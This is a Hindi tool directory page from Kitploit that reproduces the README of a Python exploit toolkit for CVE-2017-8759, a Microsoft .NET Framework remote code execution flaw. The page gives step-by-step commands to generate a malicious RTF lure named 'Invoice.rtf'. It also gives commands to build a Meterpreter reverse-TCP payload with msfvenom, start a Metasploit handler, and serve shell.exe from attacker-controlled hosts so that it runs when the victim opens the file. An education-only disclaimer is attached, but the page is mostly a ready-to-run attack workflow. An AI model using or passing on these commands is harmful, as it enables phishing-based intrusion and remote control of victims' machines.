Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2017-8760 | Kitploit
उपकरण/GitHubGitHub/voraka/cve-2017-8760
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubvoraka/cve-2017-8760

cve-2017-8760

रिपॉजिटरी देखें
37 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

शोषण टूलकिट CVE-2017-8759 - v1.0

शोषण टूलकिट CVE-2017-8759 - v1.0 एक सुविधाजनक पायथन स्क्रिप्ट है जो पेंटेस्टर्स और सुरक्षा शोधकर्ताओं को Microsoft .NET Framework RCE का परीक्षण करने का एक त्वरित और प्रभावी तरीका प्रदान करती है। यह एक दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न कर सकती है और बिना किसी जटिल कॉन्फ़िगरेशन के पीड़ित को मेटास्प्लॉइट / मीटरप्रेटर / अन्य पेलोड वितरित कर सकती है।

अस्वीकरण

यह प्रोग्राम केवल शैक्षिक उद्देश्य के लिए है। बिना अनुमति के इसका उपयोग न करें। सामान्य अस्वीकरण लागू होता है, विशेष रूप से यह तथ्य कि मैं (bhdresh) इन कार्यक्रमों द्वारा प्रदान की गई जानकारी या कार्यक्षमता के प्रत्यक्ष या अप्रत्यक्ष उपयोग से होने वाली किसी भी क्षति के लिए उत्तरदायी नहीं हूँ। लेखक या कोई भी इंटरनेट प्रदाता इन कार्यक्रमों या इनके किसी भी व्युत्पन्न की सामग्री या दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है। इस कार्यक्रम का उपयोग करके आप इस तथ्य को स्वीकार करते हैं कि इन कार्यक्रमों के उपयोग से होने वाली कोई भी क्षति (डेटा हानि, सिस्टम क्रैश, सिस्टम से समझौता, आदि) bhdresh की जिम्मेदारी नहीं है।

अंत में, यह एक व्यक्तिगत विकास है, कृपया इसके दर्शन का सम्मान करें और इसका उपयोग बुरी चीजों के लिए न करें!

लाइसेंस

CC BY 4.0 लाइसेंस - https://creativecommons.org/licenses/by/4.0/

रिलीज़ नोट:

स्क्रिप्ट में निम्नलिखित क्षमताएँ पेश की गईं

root@kitploit:~
- दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न करें
- उत्पन्न RTF फ़ाइल के लिए शोषण मोड

संस्करण: पायथन संस्करण 2.7.13

परिदृश्य: स्थानीय मीटरप्रेटर पेलोड वितरित करें

वीडियो ट्यूटोरियल: https://www.youtube.com/watch?v=46jEa1bmORM
उदाहरण कमांड
root@kitploit:~
1) Generate malicious RTF file
   # python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (Optional, if using MSF Payload) : Generate metasploit payload and start handler
   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Start toolkit in exploit mode to deliver local payload
   # python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

कमांड लाइन तर्क:

root@kitploit:~
# python cve-2017-8759_toolkit.py -h

यह CVE-2017-8759 (Microsoft .NET Framework RCE) का शोषण करने के लिए एक सुविधाजनक टूलकिट है।

मोड:

-M gen                                          केवल दुर्भावनापूर्ण फ़ाइल उत्पन्न करें

     दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न करें:

      -w <Filename.rtf>                   दुर्भावनापूर्ण RTF फ़ाइल का नाम (यह फ़ाइल पीड़ित के साथ साझा करें)।

      -u <http://attacker.com/test.txt>   रिमोट txt फ़ाइल का पथ। सामान्यतः, यह एक डोमेन या IP होना चाहिए जहाँ यह टूल चल रहा है।
                                          उदाहरण के लिए, http://attackerip.com/test.txt (यह URL दुर्भावनापूर्ण RTF फ़ाइल में शामिल किया जाएगा और पीड़ित द्वारा दुर्भावनापूर्ण RTF फ़ाइल खोलने पर अनुरोध किया जाएगा)।

				      
-M exp                                          शोषण मोड प्रारंभ करें

     शोषण:
  
      -p <TCP पोर्ट:डिफ़ॉल्ट 80>            स्थानीय पोर्ट नंबर।

      -e <http://attacker.com/shell.exe>  एक निष्पादन योग्य फ़ाइल / मीटरप्रेटर शेल / पेलोड का पथ जिसे लक्ष्य पर निष्पादित करने की आवश्यकता है।

      -l </tmp/shell.exe>                 एक निष्पादन योग्य फ़ाइल / मीटरप्रेटर शेल / पेलोड का स्थानीय पथ निर्दिष्ट करें।

लेखक

@bhdresh

श्रेय

@Voulnet, @vysec, @bhdresh

बग, समस्याएँ, सुविधा अनुरोध

स्पष्ट रूप से, मैं एक पूर्णकालिक डेवलपर नहीं हूँ, इसलिए कुछ रुकावटों की उम्मीद करें

कृपया बग और समस्याओं की रिपोर्ट इस लिंक के माध्यम से करें https://github.com/bhdresh/CVE-2017-8759/issues/new

टूल डाउनलोड करें